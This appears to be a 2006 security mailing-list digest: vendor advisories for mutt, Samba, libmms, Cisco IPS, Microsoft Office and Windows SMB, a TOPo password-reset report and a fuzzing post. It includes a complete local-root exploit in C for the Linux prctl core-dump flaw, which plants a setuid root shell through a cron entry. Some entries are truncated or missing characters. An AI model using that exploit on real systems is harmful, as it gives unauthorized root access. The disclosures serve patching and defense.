- Leonardo Nve <[EMAIL PROTECTED]> S21Sec


[ REFERENCES ]

* FatWire Content Server
  http://www.fatwire.com/cs/Satellite/CSPage_US.html

* S21Sec
  http://www.s21sec.com

TOPo v.2.2.178 Account Reset

[darkz . gsa]

TOPo v.2.2.178 Account Reset


Author: Attila Gerendi (Darkz)

Date: July 12, 2006

Package: TOPo (http://ej3soft.ej3.net/)

Versions Affected: 2.2.178 (Other versions may also be affected.)

Severity: Password Reset


Description:


 It is possible to overide an existing entry posting a new entry with a 
previous entry ID. 

 The ID can be extracted from the main window links ex:

http://[host]/[path]/index.php?m=top&s=out&ID=1152699749.6695

 The new entry will overide the original entry, also this will overide the 
original password.

 Another problem is the ID formath xx. where  is the original 
(initial) password.

 

 

Solution:

TOPo development seen to be suspended by now. No new release from January 5 
2005. 

[SECURITY] [DSA 1108-1] New mutt packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1108-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
Jul 11th, 2006  http://www.debian.org/security/faq
- --

Package: mutt
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-3242
Debian Bug : 375828

It was discovered that the mutt mail reader performs insufficient
validation of values returned from an IMAP server, which might overflow
a buffer and potentially lead to the injection of arbitrary code.

For the stable distribution (sarge) this problem has been fixed in
version 1.5.9-2sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 1.5.11+cvs20060403-2.

We recommend that you upgrade your mutt package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2.dsc
  Size/MD5 checksum:  775 6dded70d1b853282f90168f83a3da833

http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2.diff.gz
  Size/MD5 checksum:94233 7c72a620b8772515556b986bfb93b0fb
http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9.orig.tar.gz
  Size/MD5 checksum:  3033253 587dd1d8f44361b73b82ef64eb30c3a0

  Alpha architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_alpha.deb
  Size/MD5 checksum:  1530480 f93c6b6e3d599a00d8927cc67c1ce691

  AMD64 architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_amd64.deb
  Size/MD5 checksum:  1442518 aeb593803115ca292f2112fbf44106fc

  ARM architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_arm.deb
  Size/MD5 checksum:  1420526 569e402f7715c2116d0445dedd8a419f

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_i386.deb
  Size/MD5 checksum:  1416838 e38785e2498fca52d8a7bbefae26fa94

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_ia64.deb
  Size/MD5 checksum:  1626542 2aa9e0061439f25598ce205ef680acc1

  HP Precision architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_hppa.deb
  Size/MD5 checksum:  1467244 5731fe300b59d268423108e5073c29ac

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_m68k.deb
  Size/MD5 checksum:  1370346 a9acf01e90144e69d06f5ab94984e3fa

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_mips.deb
  Size/MD5 checksum:  1474126 ed6c9bd33b9f3173dac03c9bc8da120a

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_mipsel.deb
  Size/MD5 checksum:  1472642 b1693682bf38da32054e638c37b6ab56

  PowerPC architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_powerpc.deb
  Size/MD5 checksum:  1446202 6226966d71933436a2909dfc9a9c57a8

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_s390.deb
  Size/MD5 checksum:  1444064 50bcd604cf4ebe69d4bd4e11c44cdb88

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_sparc.deb
  Size/MD5 checksum:  1417006 056963151226667c293f13c4b8a2db88


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEstAcXm3vHE4uyloRAoyjAKDJ0AHvdlXXjNl+FUq5VFzk/ZCM8wCfZ/Tr
wOSRNhC+EzSkLuBEMiZmlXc=
=akN4
-END PGP SIGNATURE-

Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )

[Roman Medina-Heigl Hernandez]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Maybe this is obvious for Paul Starzetz (as well as many other people) but
full-disclosure is not really "full" without exploit code.

Working exploit attached. You can also download it from:
http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c

Greetz to !dSR ppl :-)

- --

Saludos,
- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (MingW32)

iD8DBQFEtD815H+KferVZ0IRAjhKAKCtHnTCwV0D/kH3dt0HItQUPZ/JegCglaQM
vO8VFJyxf+EXy2buqTK4kVM=
=dzRm
-END PGP SIGNATURE-
/*/
/* Local r00t Exploit for:   */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)   */
/* By:   */
/* - dreyer<[EMAIL PROTECTED]>   (main PoC code)   */
/* - RoMaNSoFt <[EMAIL PROTECTED]> (local root code) */
/*  [ 10.Jul.2006 ]  */
/*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char 
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
 * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh 
; rm -f /etc/cron.d/core\n";

int main() { 
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);

printf("[*] Running shell (remember to remove /tmp/sh when finished) 
...\n");
system("/tmp/sh -i");
}

NSFOCUS SA2006-04 : Microsoft Office GIF Filter Buffer Overflow Vulnerability

[NSFOCUS Security Team]

NSFOCUS Security Advisory (SA2006-04)

Microsoft Office GIF Filter Buffer Overflow Vulnerability

Release Date: 2006-07-12

CVE ID: CVE-2006-0007

http://www.nsfocus.com/english/homepage/research/0604.htm

Affected systems & software
===
Microsoft Office 2000
Microsoft Office XP
Microsoft Office 2003

Unaffected systems & software
===


Summary
=

NSFocus Security Team discovered a buffer overflow vulnerability in Microsoft 
Office
GIF filter, which could allow attackers to run arbitrary code via a carefully 
crafted
GIF image. 

Description


GIFIMP32.FLT is a GIF image filter shipped with Microsoft Office, which is 
installed by default in %CommonProgramFiles%\Microsoft 
Shared\Grphflt\GIFIMP32.FLT. 

GIFIMP32.FLT contains a buffer overflow vulnerability in the handling of some
malformed GIF images, which allows attackers to run arbitrary code. Any 
application
that calls GIFIMP32.FLT is affected by this vulnerability. For example, 
mspaint.exe
will call the filter automatically when opening files in .gif format, if 
Microsoft
Office is installed. Attackers could gain control over a system by alluring 
users to
open a malicious GIF image.

Workaround
=

1. Do not open any GIF image from untrusted sources. 
2. Temporarily remove GIFIMP32.FLT. 

Vendor Status
==

2005.05.27  Informed the vendor
2005.06.02  Vendor confirmed the vulnerability
2006.07.11  Microsoft has released a security bulletin (MS06-039) and related 
patches. 

For more details about the security bulletin, please refer to: 
http://www.microsoft.com/technet/security/bulletin/MS06-039.mspx

Additional Information


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0007 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===

Yu Yang of NSFocus Security Team found the vulnerability.

DISCLAIMS
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

[ MDKSA-2006:117-1 ] - Updated libmms packages fix buffer overflow vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2006:117-1
 http://www.mandriva.com/security/
 ___
 
 Package : libmms
 Date: July 12, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause 
 a denial of service (application crash) and possibly execute arbitrary code 
 via the (1) send_command, (2) string_utf16, (3) get_data, and (4) 
 get_media_packet functions, and possibly other functions. Libmms uses the
 same vulnerable code.

 Update:

 The previous update for libmms had an incorrect/incomplete patch. This
 update includes a more complete fix for the issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 e9fd0a2b5764917cfaf2e9bf45af2e5d  2006.0/RPMS/libmms0-0.1-1.2.20060mdk.i586.rpm
 b556179bdc4842b0cc923346494dadce  
2006.0/RPMS/libmms0-devel-0.1-1.2.20060mdk.i586.rpm
 a539ad416a9f9b1252fa12e5b2c29b60  2006.0/SRPMS/libmms-0.1-1.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 2a16fb87e7c00d2246f5f0716d6451eb  
x86_64/2006.0/RPMS/lib64mms0-0.1-1.2.20060mdk.x86_64.rpm
 b2775f1f51106cfdb390627a455c3c28  
x86_64/2006.0/RPMS/lib64mms0-devel-0.1-1.2.20060mdk.x86_64.rpm
 a539ad416a9f9b1252fa12e5b2c29b60  
x86_64/2006.0/SRPMS/libmms-0.1-1.2.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEtTOwmqjQ0CJFipgRAuL5AJ9bqGCwiEw5NRx9UIlaOQozMi8AZACdG3V/
3fsWvnOjupNxWCtteJZZEb0=
=lbPH
-END PGP SIGNATURE-

Microsoft Excel Array Index Error Remote Code Execution

[Sowhat]

Microsoft Excel Array Index Error Remote Code Execution



By Sowhat of Nevis Labs
2006.07.11

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060711.txt

Vendor
Microsoft Inc.

Products affected:
Microsoft Office 2000 Service Pack 3
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 1 or Service Pack 2
maybe some others


Remote: YES
Exploitable: YES

CVE: CVE-2006-1306

Overview:

This vulnerability allows remote attackers to execute arbitrary code in
the context of the logged in user. An array boundary condition may be
violated by a malicious .xls file in order to redirect execution into
attacker-supplied data. Exploitation requires that the attacker coerce or
persuade the victim to open a malicious .XLS file.


Details:

The specific flaw exists within the parsing of the BIFF file format used
by Microsoft Excel.


A function pointer is not validated and insecurely affected by some user
supplied data, thus resulting code execution.


The disassembly code:


.text:300ABAFC sub_300ABAFCproc near   ; CODE XREF:
sub_3008FEA4+B5p
.text:300ABAFC ; sub_30096EC8-5F2p ...
.text:300ABAFC
.text:300ABAFC arg_0   = dword ptr  4
.text:300ABAFC arg_4   = dword ptr  8
.text:300ABAFC arg_8   = dword ptr  0Ch
.text:300ABAFC
.text:300ABAFC mov eax, [esp+arg_0] 
.text:300ABB00 movsx   ecx, word ptr [eax]  --> [eax]
read from the XLS file
.text:300ABB03 push[esp+arg_8]
.text:300ABB07 imulecx, 14h
.text:300ABB0A push[esp+4+arg_4]
.text:300ABB0E pusheax
.text:300ABB0F mov eax, dword_308792C4  -->
[eax]=00e17638,always, maybe different in the language SYSTEM
.text:300ABB14 calldword ptr [ecx+eax]  --> 
Here! call your CODE.
.text:300ABB17 retn0Ch
.text:300ABB17 sub_300ABAFCendp


eax is the index and always set to 00e17638h(?), and the ecx can vary
from a very wide range, so we the attacker can plant specific data
somewhere and CALL it.



The supplied data will be used to some operate and after some caculate
(such as imul) will be used for direct memory access, in this case,
we can caculate and specially choose some value which contains data we
can control, will easily lead to remote code execution.


POC:

No POC will be supplied


Fix:

Microsoft has released an update for Microsoft Office which is
set to address this issue. This can be downloaded from:

http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx


Vendor Response:

2006.05.30 Vendor notified via [EMAIL PROTECTED]
2006.05.30 Vendor responded
2006.07.11 Vendor released MS06-037 patch
2006.07.11 Advisory released


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


   CVE-2006-1306




Reference:

1. http://sc.openoffice.org/excelfileformat.pdf
2. http://www.microsoft.com/technet/security/Bulletin/MS06-037.mspx
3. http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
4. http://www.eeye.com/html/research/advisories/AD20051104.html



Greetings to [EMAIL PROTECTED] :)
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"

SMB Information Disclosure Vulnerability

[Avert]

___


McAfee, Inc.

McAfee® Avert® Labs Security Advisory

Public Release Date: 2006-07-11


SMB Information Disclosure Vulnerability


CVE-2006-1315

___


•   Synopsis


An information disclosure vulnerability exists in the Server service that could 
allow an attacker to retrieve fragments of memory from an affected host via the 
host’s SMB server. 
___


•   Vulnerable System or Application


Microsoft Windows 2000

Microsoft Windows XP w/ Service Pack 1

Microsoft Windows XP w/ Service Pack 2

Microsoft Windows Server 2003

Microsoft Windows Server 2003 w/ Service Pack 1


___


•   Vulnerability Information


This issue is caused by the Server protocol driver’s failure to zero out memory 
before reusing it when constructing SMB response messages. An attacker could 
exploit this vulnerability by sending a specially crafted request that when 
processed would result in a response packet being sent that unintentionally 
contained portions of memory from the target host. Note that this vulnerability 
would not allow an attacker to execute code or to elevate their user rights 
directly. It could be used to produce useful information to try to further 
compromise the affected system.

___


•   Resolution


Microsoft has released a security bulletin and associated patch for this 
vulnerability:

http://www.microsoft.com/technet/security/Bulletin/MS06-035.mspx 


___


•   Credits


This vulnerability was discovered by Mike Price and Rafal Wojtczuk of McAfee 
Avert Labs. 

___


•   Legal Notice


Copyright (C) 2006 McAfee, Inc.

The information contained within this advisory is provided for the convenience 
of McAfee’s customers, and may be redistributed provided that no fee is charged 
for distribution and that the advisory is not modified in any way. McAfee makes 
no representations or warranties regarding the accuracy of the information 
referenced in this document, or the suitability of that information for your 
purposes.


McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee, Inc. 
and/or its affiliated companies in the United States and/or other Countries.  
All other registered and unregistered trademarks in this document are the sole 
property of their respective owners.

Fuzzing Microsoft Office

[naveed]

Last friday I have posted a POC regarding the microsoft office mso.dll
boundary condition error, i have checked the code flow of mso_203 and
it was producing access violation errors which i have sent to bugtraq
and FD , microsoft's MSRC blog has been updated at
http://blogs.technet.com/msrc/archive/2006/07/10/441006.aspx  stating
that the vulnerability is not remotely exploitable , that is true.
However while checking a bunch of fuzzed documents several other
problems have been noticed, even other people have reported the issues
with different office applications. Some of them were able to
reproduce the issue and they are exploitable others may not be.
Microsoft Office vulnerabilities are not new but recently interest is
increased , it has been noticed that people fuzzing the documents and
afterwards they don't know which type of error it is or whether the
vulnerability is exploitable or not !!. Just note how many 0-days have
been reported in the past few months in MS Office products. It is
interesting to see that most of these vulnerabilities are directly or
indirectly related to fuzzing and or changing the normal behavior of
documents.

If we take the example of this recently discovered HLINK.DLL buffer
overflow flaw , the kcope who reported it used the Perl's Excel
worksheet generator to generate a long URL string in the worksheet,
interestingly Microsoft Office does not allow you to generate the
hyperlinks with such long strings (usually restricted to 256 bytes) ,
even the OLE automation restricts you but the Microsoft's binary file
format does not have such restrictions for "hyperlink" objects, maybe
it was assumed that library is safe since office is not allowing the
users to have such nasty url's.

The problem of generating the specially crafted files is not a big
issue, it was assumed that one should know the binary file format in
order to generate some "valid document" (one which is parsable by the
applications), but the Perl's library is just an example, nanika
posted another style sheet flaw in ms excel which looks like the
result of an exercise with same library.

Few days back the same exploit was released for MS Word , it is also
interesting that 3rd party libraries are not that much restrictive
when producing the MS Office compatible files, they allow you to do
some really funny stuff. For example it is an open question that why
OpenOffice developer's decided to accept a url string of say 20,000
bytes (perhaps of indefinite length) ?? One can easily identify some
new problems while experimenting this stuff.


-
Naveed Afzal

rPSA-2006-0128-1 samba samba-swat

[Justin M. Forbes]

rPath Security Advisory: 2006-0128-1
Published: 2006-07-11
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403
https://issues.rpath.com/browse/RPL-496

Description:
In previous versions of the samba package, a remote attacker can
cause samba to consume all system memory, leading to a denial of
service.

Cisco Security Advisory: Cisco Intrusion Prevention System Malformed Packet Denial of Service

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: Cisco Intrusion Prevention System Malformed
Packet Denial of Service

Advisory ID: cisco-sa-20060712-ips

http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml

Revision 1.0

For Public Release 2006 July 12 1600 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Cisco Intrusion Prevention System (IPS) software version 5.1 is
vulnerable to a denial of service condition caused by a malformed
packet, which may result in an IPS device becoming inaccessible
remotely or via the console and fail to process packets. A power
reset is required to recover the IPS device. There are no workarounds
for this vulnerability.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml

Affected Products
=

Vulnerable Products
+--

Cisco Intrusion Prevention System 42xx appliances running IPS
software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d), 5.1(1e)
or 5.1(p1).

IPS software versions 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d) and 5.1(1e)
are repackaged versions of 5.1(1) created to fix various installation
problems. All 5.1(1) patch versions report 5.1(1) as the installed
version.

Note: Some IDS/IPS appliances shipped before IPS software version 5.0
was available and have model numbers starting with IDS, not IPS.

The following 42xx appliances are potentially affected.

  * IDS-4235
  * IPS-4240
  * IDS-4250-SX
  * IDS-4250-TX
  * IDS-4250-XL (4250 with XL accelerator card)
  * IPS-4255

Products Confirmed Not Vulnerable
+

All devices running Cisco Intrusion Detection Systems (IDS) software
versions 4.x or IPS versions 5.0(x).

Additionally, the following devices are not vulnerable even if
running IPS software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1
(1d), 5.1(1e) or 5.1(1p1).

  * NM-CIDS
  * IDSM-2
  * ASA-SSM-AIP-10
  * ASA-SSM-AIP-20
  * IDS-4210
  * IDS-4215

The following devices do not support IPS software version 5.1 and are
not vulnerable.

  * IDS-4220
  * IDS-4230

To determine the version of software running an IPS device, log into
the IPS device using an SSH client and issue the command show version.

sensor#show version 
Application Partition: Cisco Intrusion
Prevention System, Version 5.1(1p1)S215.0


Details
===

Cisco Intrusion Prevention Systems (IPS) are a family of network
security devices that provide network based threat prevention
services. A vulnerability exists in the custom device driver for
Intel-based gigabit network adapters used to process packets received
by the sensing interfaces of certain IPS devices. A malformed IP
packet received on an Intel-based gigabit network adapter configured
for use as a sensing interface may result in the IPS device
experiencing a kernel panic. Affected IPS devices will cease
processing packets, producing alerts, performing automated actions
such as logging, and become inaccessible remotely or via the console.

If deployed as an inline device, the IPS will also stop forwarding
packets between interfaces and may cause a network outage. IPS
devices configured to use the auto-bypass feature will also fail to
forward packets. Attackers may use this vulnerability to disable an
IPS device to hide malicious activity. This vulnerability only
affects certain IPS devices configured to use Intel-based gigabit
network adapters as sensing interfaces. IPS devices configured to use
an Intel-based gigabit network adapter as a management interface are
not affected by this vulnerability. A power reset is required to
recover the IPS device.

This vulnerability is documented in Cisco bug ID CSCsd36590 ( 
registered customers only) .

Impact
==

Successful exploitation of the vulnerability may result in the
failure of an IPS device to operate as expected. Affected devices
will become inaccessible remotely or via the console and stop
processing packets. If deployed as an inline device, an IPS device
will stop forwarding packets, including devices configured to use the
auto-bypass feature. This may result in a network outage. A power
reset is required to recover the IPS device.

Software Version and Fixes
==

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to

[USN-314-1] samba vulnerability

[Martin Pitt]

=== 
Ubuntu Security Notice USN-314-1  July 12, 2006
samba vulnerability
CVE-2006-3403
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  samba3.0.10-1ubuntu3.1

Ubuntu 5.10:
  samba3.0.14a-6ubuntu1.1

Ubuntu 6.06 LTS:
  samba3.0.22-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The Samba security team reported a Denial of Service vulnerability in
the handling of information about active connections. In certain
circumstances an attacker could continually increase the memory usage
of the  smbd process by issuing a large number of share connection
requests. By draining all available memory, this could be exploited to
render the remote Samba server unusable.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1.diff.gz
  Size/MD5:   107580 f41e99280b44e47c1e1a0c86a56c66de

http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1.dsc
  Size/MD5:  978 d516ac96d66dbda1388e861ec8220ee7
http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10.orig.tar.gz
  Size/MD5: 15176926 b19fd86d3c11a1b43f75a5988cd9ceeb

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.0.10-1ubuntu3.1_all.deb
  Size/MD5: 11676712 55beda5b448bd6ef999d76a8e75ad3aa

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/s/samba/libpam-smbpass_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:   372670 7e7a00d1458113ae03ab9ceef1c33f92

http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:   780744 a9e481451b19277676fe825118b6097b

http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:   590090 8d76d3c3b1215b421a09ad40714ae533

http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  5070312 35dfb5c2e732296d16c242af7d1386e7

http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  2150094 835196ef9aeac4f16356522cb2d6b493

http://security.ubuntu.com/ubuntu/pool/universe/s/samba/samba-dbg_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  6390788 5b4cb573a5813c12dbca92895612306e

http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  2733990 311b65f9c3d9bcfbae6cf527a7101081

http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  2813560 a5fdc57b8c3f39a1599685971196cb1f

http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:   403878 39ed8078277f923e533f01c62d96981a

http://security.ubuntu.com/ubuntu/pool/universe/s/samba/swat_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  4062114 94d4663ac08126eae60227429a8e1143

http://security.ubuntu.com/ubuntu/pool/universe/s/samba/winbind_3.0.10-1ubuntu3.1_amd64.deb
  Size/MD5:  1623058 83d1e2d9b57331a14d50d1a5fd231aff

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/s/samba/libpam-smbpass_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:   329214 0a57f5b7ec5c9d426a1a5d0306a0ee72

http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:   704546 84d98ae1dd41a8161ad8ea097dbc8a4e

http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:   523310 59e49f6c871b85bf6cb04ee4b264bd39

http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:  4464594 10ded0e61a32f344633d25eb5c6f55a3

http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:  1887970 19f0177cbc0cbcdc795c6fb742512152

http://security.ubuntu.com/ubuntu/pool/universe/s/samba/samba-dbg_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:  6543900 7920120df8ae6d539965c199c07d1604

http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:  2355884 d309130e0783d153dc891a9a6a5ecaf3

http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.10-1ubuntu3.1_i386.deb
  Size/MD5:  2394052 5aa3665da0c4e601c98bceae300d6873

http://security.ubuntu.com/ubuntu/pool/main/s/sa

Re: [ANNOUNCEMENT] Samba 3.0.1 - 3.0.22: memory exhaustion DoS against smbd

[Gerald (Jerry) Carter]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Gerald (Jerry) Carter wrote:
> ==
> ==
> == Subject: Memory exhaustion DoS against smbd
> == CVE ID#: CAN-2006-1059
  ^^
> ==
> == Versions:Samba Samba 3.0.1 - 3.0.22 (inclusive)
> ==
> == Summary: smbd may allow internal structures
> ==  maintaining state for share connections
> ==  to grow unbounded.
> ==
> ==

This is a cut-n-paste error.  The correct CVE # is
CVE-2006-3403.  Sorry for any confusion. It has been
updated on the web site as well.  All other information
is correct.






cheers, jerry
=
Samba--- http://www.samba.org
Centeris ---  http://www.centeris.com
"What man is a man who does not make the world better?"  --Balian
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
